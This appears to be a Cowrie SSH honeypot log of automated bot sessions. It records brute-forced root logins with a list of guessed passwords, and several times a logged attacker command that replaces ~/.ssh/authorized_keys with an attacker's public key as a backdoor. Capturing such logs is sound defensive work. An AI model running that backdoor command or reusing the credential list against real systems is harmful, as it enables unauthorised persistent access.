{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:41:32.723709Z","src_ip":"36.89.28.139","session":"1870c0f61d07"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:41:33.544181Z","src_ip":"36.89.28.139","session":"1870c0f61d07"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:33.739246Z","src_ip":"36.89.28.139","session":"1870c0f61d07"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:33.747021Z","src_ip":"36.89.28.139","session":"48d58e290dcc"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":44110,"dst_ip":"1.2.3.4","dst_port":22,"session":"7662320f8b36","protocol":"ssh","message":"New connection: 24.108.102.132:44110 (1.2.3.4:22) [session: 7662320f8b36]","sensor":"my-vps","timestamp":"2025-08-26T00:41:35.730051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:41:35.740976Z","src_ip":"24.108.102.132","session":"7662320f8b36"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:41:35.908013Z","src_ip":"24.108.102.132","session":"7662320f8b36"}
{"eventid":"cowrie.login.success","username":"root","password":"Root123321","message":"login attempt [root/Root123321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:41:36.562433Z","src_ip":"24.108.102.132","session":"7662320f8b36"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:41:36.910099Z","src_ip":"24.108.102.132","session":"7662320f8b36"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:41:36.910798Z","src_ip":"24.108.102.132","session":"7662320f8b36"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:41:36.911506Z","src_ip":"24.108.102.132","session":"7662320f8b36"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:37.076711Z","src_ip":"24.108.102.132","session":"7662320f8b36"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":41662,"dst_ip":"1.2.3.4","dst_port":22,"session":"df31953f801e","protocol":"ssh","message":"New connection: 45.159.112.103:41662 (1.2.3.4:22) [session: df31953f801e]","sensor":"my-vps","timestamp":"2025-08-26T00:41:37.080255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:41:37.081051Z","src_ip":"45.159.112.103","session":"df31953f801e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:41:37.195309Z","src_ip":"45.159.112.103","session":"df31953f801e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:41:37.508576Z","src_ip":"24.108.102.132","session":"7662320f8b36"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:41:37.509278Z","src_ip":"24.108.102.132","session":"7662320f8b36"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:41:37.674391Z","src_ip":"24.108.102.132","session":"7662320f8b36"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:37.675349Z","src_ip":"24.108.102.132","session":"7662320f8b36"}
{"eventid":"cowrie.login.success","username":"root","password":"Nb123456.","message":"login attempt [root/Nb123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:41:37.780413Z","src_ip":"45.159.112.103","session":"df31953f801e"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":44114,"dst_ip":"1.2.3.4","dst_port":22,"session":"87e98f1b717f","protocol":"ssh","message":"New connection: 24.108.102.132:44114 (1.2.3.4:22) [session: 87e98f1b717f]","sensor":"my-vps","timestamp":"2025-08-26T00:41:37.825275Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:41:37.830488Z","src_ip":"24.108.102.132","session":"87e98f1b717f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:41:37.992726Z","src_ip":"24.108.102.132","session":"87e98f1b717f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:41:38.093267Z","src_ip":"45.159.112.103","session":"df31953f801e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:41:38.094119Z","src_ip":"45.159.112.103","session":"df31953f801e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:41:38.095392Z","src_ip":"45.159.112.103","session":"df31953f801e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:38.210886Z","src_ip":"45.159.112.103","session":"df31953f801e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:41:38.464518Z","src_ip":"45.159.112.103","session":"df31953f801e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:41:38.465459Z","src_ip":"45.159.112.103","session":"df31953f801e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:41:38.583402Z","src_ip":"45.159.112.103","session":"df31953f801e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:38.584288Z","src_ip":"45.159.112.103","session":"df31953f801e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:41:38.652311Z","src_ip":"24.108.102.132","session":"87e98f1b717f"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":41670,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b1a7da78f3f","protocol":"ssh","message":"New connection: 45.159.112.103:41670 (1.2.3.4:22) [session: 4b1a7da78f3f]","sensor":"my-vps","timestamp":"2025-08-26T00:41:38.691410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:41:38.692145Z","src_ip":"45.159.112.103","session":"4b1a7da78f3f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:41:38.801856Z","src_ip":"45.159.112.103","session":"4b1a7da78f3f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:41:39.279574Z","src_ip":"45.159.112.103","session":"4b1a7da78f3f"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:39.820065Z","src_ip":"24.108.102.132","session":"87e98f1b717f"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":44120,"dst_ip":"1.2.3.4","dst_port":22,"session":"e375ec30318a","protocol":"ssh","message":"New connection: 24.108.102.132:44120 (1.2.3.4:22) [session: e375ec30318a]","sensor":"my-vps","timestamp":"2025-08-26T00:41:39.970106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:41:39.981061Z","src_ip":"24.108.102.132","session":"e375ec30318a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:41:40.143278Z","src_ip":"24.108.102.132","session":"e375ec30318a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:40.390627Z","src_ip":"45.159.112.103","session":"4b1a7da78f3f"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":44182,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddd8d8f56276","protocol":"ssh","message":"New connection: 45.159.112.103:44182 (1.2.3.4:22) [session: ddd8d8f56276]","sensor":"my-vps","timestamp":"2025-08-26T00:41:40.499059Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:41:40.500112Z","src_ip":"45.159.112.103","session":"ddd8d8f56276"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:41:40.609454Z","src_ip":"45.159.112.103","session":"ddd8d8f56276"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:41:40.813969Z","src_ip":"24.108.102.132","session":"e375ec30318a"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:40.976542Z","src_ip":"24.108.102.132","session":"7662320f8b36"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:40.982049Z","src_ip":"24.108.102.132","session":"e375ec30318a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:41:41.087127Z","src_ip":"45.159.112.103","session":"ddd8d8f56276"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:41.198390Z","src_ip":"45.159.112.103","session":"ddd8d8f56276"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:41.199307Z","src_ip":"45.159.112.103","session":"df31953f801e"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":53326,"dst_ip":"1.2.3.4","dst_port":22,"session":"95f884e82050","protocol":"ssh","message":"New connection: 27.112.78.245:53326 (1.2.3.4:22) [session: 95f884e82050]","sensor":"my-vps","timestamp":"2025-08-26T00:41:51.369560Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:41:51.370394Z","src_ip":"27.112.78.245","session":"95f884e82050"}
